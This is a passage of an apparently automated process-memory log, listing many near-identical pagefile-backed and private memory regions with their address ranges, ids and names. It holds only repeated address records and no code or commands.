monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10988 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10989 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10990 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10991 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10992 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10993 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10994 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10995 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10996 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10997 start_va = 0x4140000 end_va = 0x4140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10998 start_va = 0x4140000 end_va = 0x414ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 10999 start_va = 0x4140000 end_va = 0x415dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 11000 start_va = 0x41d0000 end_va = 0x41defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041d0000" filename = "" Region: id = 11001 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11002 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11003 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11004 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11005 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11006 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11007 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11008 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11009 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11010 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11011 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11012 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11013 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11014 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11015 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11016 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11017 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11018 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11019 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11020 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11021 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11022 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11023 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11024 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11025 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11026 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11027 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11028 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11029 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11030 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11031 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11032 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11033 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11034 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11035 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11036 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11037 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11038 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11039 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11040 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11041 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11042 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11043 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11044 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11045 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11046 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11047 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11048 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11049 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11050 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11051 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11052 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11053 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11054 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11055 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11056 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11057 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11058 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11059 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11060 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11061 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11062 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11063 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11064 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11065 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11066 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11067 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11068 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11069 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11070 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11071 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11072 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11073 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11074 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11075 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11076 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11077 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11078 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11079 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11080 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11081 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11082 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11083 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11084 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11085 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11086 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11087 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11088 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11089 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11090 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11091 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11092 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11093 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11094 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11095 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11096 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11097 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11098 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11099 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11100 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11101 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11102 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11103 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11104 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11105 start_va = 0x4140000 end_va = 0x4140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11106 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 11107 start_va = 0x4140000 end_va = 0x415dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 11108 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11109 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11110 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11111 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11112 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11113 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11114 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11115 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11116 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11117 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11118 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11119 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11120 start_va = 0x4140000 end_va = 0x4140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 11121 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11122 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11123 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11124 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11125 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11126 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11127 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11128 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11129 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11130 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11131 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11132 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11133 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11134 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11135 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11136 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11137 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11138 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11139 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11140 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11141 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11142 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11143 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11144 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11145 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11146 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11147 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11148 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11149 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11150 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11151 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11152 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11153 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11154 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11155 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11156 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11157 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11158 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11159 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11160 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11161 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11162 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11163 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11164 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11165 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11166 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11167 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11168 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11169 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11170 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11171 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11172 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11173 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11174 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11175 start_va = 